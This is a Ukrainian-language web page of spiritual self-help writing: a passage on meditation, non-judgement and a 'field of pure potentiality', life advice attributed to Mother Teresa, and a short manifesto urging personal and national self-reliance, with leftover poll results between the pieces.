Повна тиша - перша вимога для прояву ваших бажань, тому що саме в ній лежить ваша зв'язок з простором чистих потенційних можливостей, яке може відкрити для вас всю свою нескінченність.

Уявіть, що ви кинули в ставок невеликий камінчик і спостерігаєте, як по поверхні води розходиться брижі. Трохи згодом, коли брижі заспокоїться, ви кидаєте наступний камінчик. Саме це ви робите, коли входите в простір чистого безмовності і вводите туди свій намір. У цій тиші навіть найслабше намір викличе брижі на поверхні універсальної свідомості, яке пов'язує між собою все.

Але, якщо ви не домоглися нерухомості свідомості, якщо ваш розум подібний бурхливому океану, кидайте туди що завгодно, ви нічого не помітите. В Біблії є вислів: "Зупиніться і пізнайте Бога". Цього можна досягти тільки за допомогою медитації.

Є ще один спосіб проникнення в поле чистих потенційних можливостей - практика не-осудження. Осудження є постійна оцінка того, погано це чи добре, вірно чи невірно. Коли ви постійно оцінюєте, класифікуєте, аналізуєте, вішаєте ярлики, ваш внутрішній діалог стає дуже бурхливим, турбулентним. Ця турбулентність обмежує потік енергії між вами і полем чистої потенційності. Ви стискаєте "паузу" між думками в буквальному сенсі.

Ця пауза - ваш зв'язок з полем чистих потенційних можливостей. Саме це стан чистого свідомості, це безмовний простір між думками, ця внутрішня непорушність пов'язує вас з істинною силою. І коли ви стискаєте цю паузу, ви звужуєте свій зв'язок з полем чистих потенційних можливостей і нескінченних творчих можливостей.

   Починайте день молитвою, яка містить слова: "Сьогодні я не буду судити ні про що, що відбудеться". He- осудження створює тишу у вашому розумі. Протягом дня нагадуйте собі про це всякий раз, коли ви зловите себе на бажанні судити або оцінювати. Якщо займатися цим весь день здається занадто важко, ви можете просто сказати собі: "Протягом наступних двох годин я не буду ні про що судити" або "Протягом наступної години я буду дотримуватися не-осудження ". Потім поступово ви зможете збільшувати цей час.

Практика безмовності, медитація і не-осудження відкриють вам доступ до першого закону, Закону Чистої свідомісті. Коли ви почнете займатися цим, ви можете додати до своєї практики четверту складову, а саме - регулярне безпосереднє спілкування з природою. Проводячи час у спілкуванні з природою, ви зможете відчути гармонійну взаємодію всіх елементів і сил життя, що дасть вам відчуття єдності з усім життям. Будь то струмок, ліс, гора, озеро або берег моря, зв'язок з розумом природи теж надасть вам допомогу в проникненні в поле чистої потенційності.

Ви повинні навчитися приходити в зіткнення з самої потаємною частиною своєї сутності. Ця справжня сутність знаходиться за межами его. вона позбавлена страху, вона вільна, вона нечутлива до критики, її не лякають ні які випробування. Вона не гірша і не краща нікого іншого, і вона наповнена чарівництва, таємниць і чарівності.

Доступ до вашої істинної сутності дозволить вам також заглянути в дзеркало взаємин, тому що будь-які відносини - це відображення ваших взаємин з самим собою. Наприклад, якщо ви відчуваєте страх, почуття провини і невпевненість щодо грошей, успіху чи чого б то не було ще, все це суть відображення вашого страху, почуття провини і невпевненості, які є основними особливостями вашої особистості.

Ніяка кількість грошей, ніякої успіх не позбавить цих основних проблем існування. Тільки близькість з вищим Я принесе справжнє зцілення. І коли ви будете виходити із знання свого істинного Я - коли ви дійсно зрозумієте свою справжню природу, - ви ніколи не будете відчувати страху, почуття провини або невпевненості у грошових справах, в досягненні достатку, в задоволенні своїх бажань, адже ви усвідомлюєте, що квінтесенцією всіх матеріальних благ є життєва енергія, чиста потенційність. Ці потенційні можливості і є ваша справжня природа.

У міру того як ви будете отримувати все більше доступу до своєї істинної природи, у вас спонтанно почнуть виникати творчі думки, тому що поле чистої потенційності є також простором нескінченних творчих можливостей і чистого свідомості. Франц Кафка, австрійський письменник і філософ, колись писав: "Вам не потрібно залишати власну кімнату. Продовжуйте сидіти за своїм столом і слухати. Вам не потрібно навіть слухати, просто чекайте. Вам не потрібно навіть чекати, просто вчіться спокою, нерухомості і самоти. І світ вільно постане перед вами у своєму незамаскованими вигляді. У нього не залишиться вибору; він в екстазі кинеться до ваших ніг ".

Все багатство Всесвіту - щедрий прояв і достаток Всесвіту - є виразом творчого розуму природи. Чим більше ви налаштовані на розум природи, тим доступніше вам її нескінченність, її безмежні творчі можливості. Але щоб з'єднатися з цим щедрим, рясним, нескінченним творчим розумом природи, ви спочатку повинні вийти за межі свого бурхливого внутрішнього діалогу. І тоді ви забезпечите собі можливість активної діяльності при одночасній нерухомості вічного, необмеженого, творчого розуму. Це досконале поєднання безмовного, необмеженого, нескінченного розуму з активним, обмеженим індивідуальним розумом забезпечує досконалу рівновагу нерухомості з рухом, який здатне створити все, що ви побажаєте. Це співіснування протилежностей - Нерухомості і динаміки в один і той же час - робить вас незалежним від ситуацій, обставин, людей і речей.

Коли ви спокійно визнаєте це досконале співіснування протилежностей, ви об'єднаєтеся з світом енергії - квантовим туманом, нематеріальним НЕ-речовиною, яке є джерелом матеріального світу.

Цей світ енергії текучий, динамічний, еластичний, весь час змінюється, завжди в русі. І водночас він незмінний, нерухомий, спокійний, вічний і безмовний.

Взята окремо нерухомість - потенційна можливість творчості; узяте окремо рух - це можливість творчості, обмежена певним аспектом свого вираження. Але поєднання руху і нерухомості дає вам можливість вивільнити свої творчі здібності у всіх напрямках - куди б не привела вас сила вашої уваги.

Чим би ви не займалися серед руху і активності, зберігайте внутрішню нерухомість. Тоді хаотичні рухи навколо вас ніколи не будуть заважати вашому доступу до резервуару творчих можливостей, до поля чистої потенційності.


Хто ви є насправді?


0%, 0 голосов

33%, 1 голос

0%, 0 голосов

0%, 0 голосов

33%, 1 голос

0%, 0 голосов

33%, 1 голос
Авторизируйтесь, чтобы проголосовать.

Поради Матері Терези

 Люди часто витрачають своє життя на те, щоб придбати речі, які насправді їм не особливо потрібні. Багато людей говорять: Я повинен користуватися життям. Поки я живий, я повинен досягти всього, чого бажаю: знань, задоволень, грошей, слави. Вони черпають життя, насичуються ним, поки їх життєві сили не виснажуються.
Виснажені і пересичені, вони залишаються в порожнечі, і тоді розуміють, що втратили в житті більше, ніж придбали. Цінуйте саме життя, а не ті плоди і досягнення, які воно вам приносить. Той, хто віддається тільки задоволенням, рабськи слідує емоціям, пристрастям, тринькає своє життя. За все, що він набуває таким чином, має платити. І він платить своїм життям. Якщо ж людина присвячує своє життя піднесенній меті, то чим більше вона працює, тим сильнішою стає. Найголовніше - це життя, і ви повинні його захищати, очищати, зміцнювати, освітлювати. Працюйте, щоб прикрасити ваше життя, зміцнити і освятити його.
 
Наведіть в своїй ДУШІ ПОРЯДОК  Ви не знайдете у світі навколо себе нічого того, чого немає в вашій душі. Не буває людей, в яких немає нічого хорошого, як і не буває абсолютно поганих людей. У кожній душі є і хороше, і погане. Чим більше любові, мудрості, краси, доброти ви відкриєте в самому собі, тим більше ви помітите їх в навколишньому світі. Вам здається, що якщо ви чогось не бачите, цього не існує. Ні, просто ви не помічаєте в світі того, чого немає всередині вас. Зла людина не бачить добра. Жадібному все здаються жадібними, для люблячого світ здається наповненим любов'ю, а для того, хто ненавидить - ненавистю. Тому не обманюйте: ви ніколи не досягнете багатства, спокою і щастя поза собою, якщо ви не зробили зусиль, щоб знайти їх в самому собі.
 ЦІНУЙТЕ Доброту і любов ВИЩЕ ТАЛАНТУ  Всі захоплюються людьми, які володіють видатними здібностями в області науки, мистецтва або спорту. У світі багато талановитих і обдарованих людей. І це прекрасно, якщо Господь обдарував людину талантом поета, музиканта, математика. Але не таланти і обдарування врятують світ: його врятує любов і доброта. Світ потребує насамперед тих, хто здатний проявити високі моральні якості. Прагніть стати більш добрими, мудрими, люблячими, чесними. Любіть себе і все навколо вас.
 АНАЛІЗУЙТЕ ВАШЕ ЖИТТЯ Занадто часто через справи і турботи людина забуває, для чого вона прийшла у цей світ. Люди забувають, що їм недовго залишатися на цій землі. Матеріальні придбання, звання, чини - все, чого їм так важко було досягти, доведеться залишити тут. Чому ж люди спрямовують усі свої здібності тільки на те, щоб заробити побільше грошей, задовольнити свої пристрасті, смачно поїсти? Озирайтеся назад: подивіться, що ви зробили в житті з любові до ближнього, для духу й світла в світі.
 Намагайтеся не висловлювати своє невдоволення  У багатьох людей є звичка висловлювати своє невдоволення всім і вся. Невдоволення допустимо тільки по відношенню до самого себе. Скаржиться на Бога і на своє існування, це шкодити самому собі. Будьте задоволені своєю долею, миріться зі своїм становищем. Бог посилає нам випробування, щоб ми, долаючи їх, зміцнювалися, а не впадали у відчай. Незадоволені долею люди неприємні і непривабливі. Друзі віддаляються від них. Як можна залишатися поруч з людиною, яка тільки псує настрій своїми скаргами та докорами?
 До нещастя, людська натура така, що люди не люблять довго слухати про чужі турботи, нещастя, хвороби. У кожного в цьому світі свій біль. Наш світ наповнений болем, і тому позбавлений любові. Більшість людей настільки поглинена своїми нещастями, що вони не можуть відійти від самих себе, щоб любити когось іншого. Скаржачись на долю, ви не тільки марно втрачаєте час. Ви втрачаєте повагу людей. Вони бачать, що ви не розумні, не сильні. Вони постараються віддалитися від вас. Якщо ви не хочете втратити друзів, ховайте від них ваші турботи, не скаржтеся, будьте сильними. Сила і світло, які виходять від вас, привернуть до вас людей. Вони будуть захоплені тим, що ви переносите життєві випробування стійко, не скаржачись. Друзі прийдуть до вас, щоб наслідувати вас і набратися сил. І такі друзі залишаться з вами назавжди.
 Несіть ЛЮДЯМ ЖИВІ ДАРИ  У всіх країнах прийнято ходити в гості з подарунками. Ми йдемо на зустріч з іншими з бажанням принести їм щось хороше. Не приходьте до людей з порожніми руками і з порожнім серцем. Не ходіть до друзів, якщо ви не можете подарувати їм хоча б добрий погляд, добру посмішку або кілька теплих слів. Треба привчитися віддавати людям все найкраще. Потискайте друзям руки. Звичайно, для багатьох, людей рукостискання - це просто жест, абсолютно машинально. Насправді рукостискання несе в собі величезний сенс. Воно може втішити, підбадьорити, оживити людей і дати їм багато любові і тепла. Потискуючи руку одному, подумки побажайте йому здоров'я, миру і світла. Наближаючись до людей, намагайтеся посилати їм погляд, сповнений безкорисливої любові і світла. Де б ви не були, ваш погляд має бути щирим, світлим, доброзичливим, щоб люди, яких ви зустрічаєте, отримували через вас кілька променів божественної любові.
 Стежте за своїми словами  Багато людей не навчилися стримувати свої думки і почуття. Якщо ви хочете жити в мирі з людьми і з собою, не вимовляєте вголос перше, що приходить вам в голову. Спочатку подумайте. Використовуйте свою мову на благо собі та оточуючим. Говоріть тоді, коли ваше серце наповнене любов'ю. Якщо в душі кипить злість і образа, краще промовчіть. Будьте пильні, не заходите в своїй критиці або звинуваченнях надто далеко. Ніколи не кінчайте розмову словами, здатними заподіяти образу. Навіть якщо ви зобов'язані зробити комусь заслужені критичні зауваження, постарайтеся згладити їх різкість позитивним відгуком про цю людину. Адже в кожній живій істоті є щось хороше. Намагайтеся знайти це хороше, підтримати його. Перш, ніж сказати щось людині, запитаєте себе, для чого ви хочете висловитися. Ви хочете висловити свою любов, пояснити щось важливе, звільнити його, вилікувати, або ж ввести в оману, звести рахунки, принизити, образити? В останньому випадку краще промовчати. Слово дано людям не для того, щоб послаблювати або знищувати інших. Його роль - підтримати падаючого і підняти того, хто впав, дати світло тому, хто блукає в темряві, вказати дорогу і шляхи тому, хто загубився. Слово дано людям тільки для того, щоб благословляти, дякувати, об'єднуватися в справедливості, мудрості та любові. У своїх словах треба бути обачними. Але не вимовляйте пишних слів і фраз, не давайте обіцянок, яких ви не в силах виконати. Слідкуйте за своїми словами не тільки, коли ви на людях, але і вдома, в сім'ї. Наша біда в тому, що ми звикаємо до своїх ближніх і поступово починаємо вважати, що вже їм то ми можемо сказати все, що про них думаємо. Ось і виходить, що найрідніші люди чують один від одного стільки грубощів і гидот, скільки їм не сказали за все життя всі їхні найлютіші вороги, разом узяті. Зупиніться! Невже вам подобається заподіювати біль вашим близьким? Навчіться говорити з любов'ю і добротою не тільки з людьми, але і з природою: деревами, птахами, квітами, водою. Як зерна розносяться вітром і проростають десь у полі, так і наші добрі слова відлітають і, вже далеко від нас, обертаються добрими справами.
 ПРАЦЮЙТЕ З ЛЮБОВ'Ю Намагайтеся завжди працювати з любов'ю. Любов додає сили, оживляє, відроджує. Людина, яка працює без любові, тільки заради заробітку, ніколи не отримає хороших результатів. Можна працювати протягом багатьох годин з любов'ю до своєї справи і не відчути втоми. І можна обезсиліти після декількох хвилин роботи, якщо ви робите її з холодним серцем, без любові. Все, що ви робите, робіть з любов'ю або не робіть зовсім. Люди запитують себе, як стати невтомними. Секрет простий: любіть те, що ви робите, і тих, для кого ви це робите. Вкладайте в роботу душу, любов і віру. Інакше ваша робота буде безрадісною, як праця раба, який працює на свого господаря. Важливо не те, скільки ви зробите, а те, скільки любові ви вкладете в свою працю.

https://www.youtube.com/watch?v=lN6FRwcNXfI

  1. Мати Тереза — католицька черниця, засновниця доброчинних місій, лауреат Нобелівської премії миру за 1979 рік. Впродовж понад сорока років допомагала злиденним, хворим і сиротам у місті Колката в Індії.
  2. Смерть5 вересня 1997 р., Колката, Індія

Ці поради

0%, 0 голосов

33%, 4 голоса

25%, 3 голоса

0%, 0 голосов

0%, 0 голосов

25%, 3 голоса

8%, 1 голос

8%, 1 голос

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

Допоможи собі сам

Допоможи собі сам бути здоровим, бути щасливим, позитивним, дійовим, цілеспрямованим, успішним, фінансово незалежним. Сам будуй свою реальність, своє Буття, Сам будуй суспільство свідомих, відповідальних людей.

Живи громадою за своїм звичаєм. Допоможи собі побудувати своє світле майбутнє. Мрій, бажай, твори. Допоможи собі сам і веди за собою інших. Продовжуй традиції давніх цивілізацій наших предків, починаючи від 12 тисячоліття до н.е.

Допоможи собі побудувати нашу державу, громадянське суспільство, згуртувати наш народ, націю. Зміцнюй українську націю, незалежно від етнічного походження.

Розвивай свій мозок і підсвідомість, що дозволить самореалізуватися. Відновлюй звязок з Вищими силами сам, без посередників.

Допомогаймо один одному. Не покладаймося лише на допомогу іноземців. Вона буде, але ми самі маємо здолати всі труднощі і перешкоди.

І незважаючи ні на що, співай, танцюй, веселися як наші предки.

Сам знайди своє місце у світі, Всесвіті, усвідом себе його частинкою. Знай хто ти, де ти, з ким ти хочеш бути і куди хочеш іти. Повір у себе. Створи і зміцни впевненість у собі.


Які слова найповніше висвітлюють тему?0%, 0 голосов

57%, 4 голоса

0%, 0 голосов

0%, 0 голосов

14%, 1 голос

0%, 0 голосов

0%, 0 голосов

29%, 2 голоса

0%, 0 голосов

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.